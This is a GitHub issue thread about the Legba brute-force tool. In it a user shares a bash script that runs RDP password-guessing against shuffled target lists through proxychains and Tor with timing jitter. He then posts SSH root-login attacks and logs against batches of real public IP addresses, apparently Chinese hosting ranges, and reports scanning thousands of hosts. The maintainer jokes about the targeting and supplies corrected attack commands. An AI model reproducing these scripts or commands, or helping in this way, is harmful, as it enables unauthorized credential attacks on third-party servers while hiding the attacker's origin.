evilsocket
commented
11 months ago -t/--target do not support multiple targets from file, you'll have to use -M/--multiple which is a feature I just pushed on master and not tagged in a release yet
Closed myusernameis69 closed 11 months ago
evilsocket
commented
11 months ago -t/--target do not support multiple targets from file, you'll have to use -M/--multiple which is a feature I just pushed on master and not tagged in a release yet
evilsocket
commented
11 months ago PS: the first argument must be the plugin name btw
myusernameis69
commented
11 months ago Any ETA on releasing it? Btw, does it support targets file for ssh?
Thank you for your quick reply, Kindly appreciate it.
evilsocket
commented
11 months ago @myusernameis69 not really but it shouldn't take long (less than a month probably), just need some time to polish it a bit
evilsocket
commented
11 months ago and yes multi mode supports all plugins
myusernameis69
commented
11 months ago Hah, perfect!
Well, in that case, did a bash script to work with it, will share it with the world to use a targets list, hope people find it useful.
This script is designed to run Legba with randomized targets using proxychains and highlight successful logins. It is design to offer targets file support. Make sure to configure proxychains properly, test first by removing proxychains from the command. ( I have a multitor setup runing with HUP signal / rotating system / 10 instances to always provide fresh and fast proxies from tor )
#!/bin/bash
# ANSI color codes for coloring output
RED='\033[0;31m' # Color for failed connection attempts
GREEN='\033[0;32m' # Color for successful connection attempts and successful logins
NC='\033[0m' # No Color - reset to default text color
# Paths to the files (Replace with actual paths or provide these as command line arguments)
TARGETS_FILE="path/to/your/targets_list.txt" # Example: "/home/user/targets.txt"
USERNAMES_FILE="path/to/your/usernames_list.txt" # Example: "/home/user/usernames.txt"
PASSWORDS_FILE="path/to/your/passwords_list.txt" # Example: "/home/user/passwords.txt"
OUTPUT_FILE="path/to/your/output_log.txt" # File where successful connection attempts will be logged
ERROR_FILE="path/to/your/error_log.txt" # File for logging connection errors
# Configuration for Legba
TIMEOUT=30000 # Example: 15000 for 15 seconds
RETRIES=5 # Example: 3 for three retries
RETRY_TIME=1000 # Example: 5000 for 5 seconds between retries
CONCURRENCY=20 # Example: 50 for fifty concurrent connection attempts
JITTER_MIN=100 # Example: 200 for a minimum of 200 milliseconds random delay
JITTER_MAX=1000 # Example: 3000 for a maximum of 3000 milliseconds random delay
# Read targets into an array and shuffle it
readarray -t TARGETS < "$TARGETS_FILE"
RANDOMIZED_TARGETS=($(shuf -e "${TARGETS[@]}"))
# Function to process each line of output from Legba
process_output() {
while read -r line; do
if [[ "$line" == *"result found"* ]]; then
echo -e "${GREEN}$line${NC}"
else
echo "$line"
fi
done
}
# Iterate over the randomized target list
for target in "${RANDOMIZED_TARGETS[@]}"
do
echo -e "Attempting to connect to ${GREEN}$target${NC}"
# Run Legba for the current target with proxychains
proxychains legba rdp -t "$target" --username @"$USERNAMES_FILE" --password @"$PASSWORDS_FILE" --rdp-auto-logon --output "$OUTPUT_FILE" --output-format text --timeout $TIMEOUT --retries $RETRIES --retry-time $RETRY_TIME --concurrency $CONCURRENCY --jitter-min $JITTER_MIN --jitter-max $JITTER_MAX 2>&1 | process_output | tee -a "$ERROR_FILE"
# Check if Legba succeeded or failed by examining the exit status
if [ $? -ne 0 ]; then
echo -e "${RED}Failed to connect to:${NC} $target" | tee -a "$ERROR_FILE"
fi
done
echo "Script completed."@myusernameis69 released as 0.4.0, check this entry of the wiki https://github.com/evilsocket/legba/wiki/Usage-and-Main-Options#selecting-one-or-more-targets
myusernameis69
commented
11 months ago @myusernameis69 released as 0.4.0, check this entry of the wiki https://github.com/evilsocket/legba/wiki/Usage-and-Main-Options#selecting-one-or-more-targets
Thanks a lot! Seems like i skipped reading entire wiki, haha :D
Now got this new problem witch I personally consider a bug, i might be dumb, but check this out:
When getting [ERROR] attempt 2/2: Invalid address was provided: failed to lookup address information: Name or service not known Even if I started checking 10 ips, it skips the rest returning that 1 address is unsolvable or invalid ( it is valid, but probably can't solve a dns lookup ). It should continue checking the rest of the ips till all 10 is finished, even if error, right ?
[INFO ] targeting 8.217.150.222,8.218.159.241,8.219.67.107,8.210.237.216,8.220.23.160,8.219.237.80,8.212.154.65,8.129.13.149,8.134.156.232,8.245.7.184 [INFO ] username -> string 'root' [INFO ] password -> string '@/root/thc-hydra/passwords.txt'
[INFO ] tasks=100 mem=19.1 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [ERROR] attempt 2/2: Invalid address was provided: failed to lookup address information: Name or service not known [INFO ] runtime 27.115741663s Already checked: 8.210.22.202 Already checked: 8.136.123.210 Already checked: 8.218.243.198 Already checked: 8.134.201.206 Already checked: 8.212.145.201 ProxyChains-3.1 (http://proxychains.sf.net) legba v0.3.0
[INFO ] targeting 8.36.250.129,8.134.91.75,8.210.216.118,8.217.31.209,8.213.197.139,8.218.97.11,8.218.243.152,8.208.11.50,8.213.21.60,8.217.236.57 [INFO ] username -> string 'root' [INFO ] password -> string '@/root/thc-hydra/passwords.txt'
[INFO ] tasks=100 mem=19.7 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s
evilsocket
commented
11 months ago what command line are you using? i see you're still passing "@/root/thc-hydra/passwords.txt" which, as I already said, it's wrong .. remove the @ ....
evilsocket
commented
11 months ago From what I see you should be using:
legba ssh -T "8.217.150.222,8.218.159.241,8.219.67.107,8.210.237.216,8.220.23.160,8.219.237.80,8.212.154.65,8.129.13.149,8.134.156.232,8.245.7.184" --username root --password /root/thc-hydra/passwords.txt
myusernameis69
commented
11 months ago proxychains legba ssh --target "8.222.203.176,8.222.205.200,8.222.206.230,8.222.207.218,8.222.208.36,8.222.208.182,8.222.210.120,8.222.212.254,8.222.214.206,8.222.214.242" --username "root" --password "@/root/thc-hydra/passwords.txt" --output "/root/thc-hydra/LEGBA_GOOD_SSH.txt" --output-format "text" --timeout "30000" --retries "2" --retry-time "10000" --concurrency "100" --jitter-min "500" --jitter-max "15000"
evilsocket
commented
11 months ago seems fine apart from the @ ... i can confirm that even if one of the address is not reachable, it does continue with the other ones until completed
evilsocket
commented
11 months ago yep can confirm it behaves as expected:
evilsocket
commented
11 months ago (someone's targeting chinese infrastructures uh? :D)
myusernameis69
commented
11 months ago Hahahaha, it's just for "demonstration" purposes :P
Sooo, yes, the problem was coming from @ lol :D, now if that error happens, it just keeps checking the other ips. Amazing tool man :) wish someday i get to your level, love the nickname too.
evilsocket
commented
11 months ago glad we got it working! have fun with your "demonstration" ;)
myusernameis69
commented
11 months ago Thanks a lot :D
Is there a limit to how many ips can be sent as comma separated ?
evilsocket
commented
11 months ago @myusernameis69 nope, no limit ... but if you have many, I suggest you use a file ( -T "@file-with-ips.txt" .. in this case @ is valid ) ... or an ip range expression ... as the wiki says:
The --target/-T argument supports one or multiple targets expressed as one of the following, or a comma separated list of the following:
--target 127.0.0.1, --target www.google.com, ... single target.--target 127.0.0.1:22 single target with port.--target 127.0.0.1, 192.168.1.1:80 comma separated list of targets.--target @targets.txt load a list of targets from a file.--target 192.168.1.1-10, --target 192.168.1.1-10:22 IP range (with or without port).--target 192.168.1.0/24, --target 192.168.1.0/24:22 CIDR (with or without port).--target 10.0.0.1, 172.0.0.1:2222, @other-targets.txt, 192.168.1.1-10 any comma separated combination of them.myusernameis69
commented
11 months ago It seems i just can't get it working with @ and as well with ips separated by comas now experiencing problems.
Can you please writ 2 full commands for both as example ? getting totally lost :(
evilsocket
commented
11 months ago legba ssh -T @filename-with-ips.txt --username root --password /root/thc-hydra/passwords.txt
myusernameis69
commented
10 months ago For past 3 days still figuring out how to increase speed, tried playing and changin values to all options but non helped. Any suggestion on how to make it work faster? Did noly 6k ip's in 28 hours.
myusernameis69
commented
10 months ago Forgot to mention: [INFO ] tasks=500 mem=20.8 MiB done=6180 (0.06%) errors=6180 speed=0 reqs/s From 6180 checked, 6180 error, that's not right, is it ?
evilsocket
commented
10 months ago you are using too many concurrent requests, i'd suggest you leave the default value and see how it goes
Hey!
Tryin to run a simple rdp brute and even if I have only 1 ip in my ip file, it always returning syntax error!
root@debian:~# legba -t @/root/rdp_targets.txt --username @/root/admin_userlist.txt --password @/root/passwords.txt --rdp-auto-logon --output /root/LEGBA_GOOD.txt --output-format text --timeout 30000 --retries 5 --retry-time 1000 --concurrency 5 --jitter-min 500 --jitter-max 500 rdp
[INFO ] targeting @/root/rdp_targets.txt Error: "invalid socket address syntax"
Content of rdp_targets.txt is: ip ip ip ip
What is the problem causing this ? Is there any other format for the ip-s in the file ? File contains IPv4 addresses, not 6.
Thanks!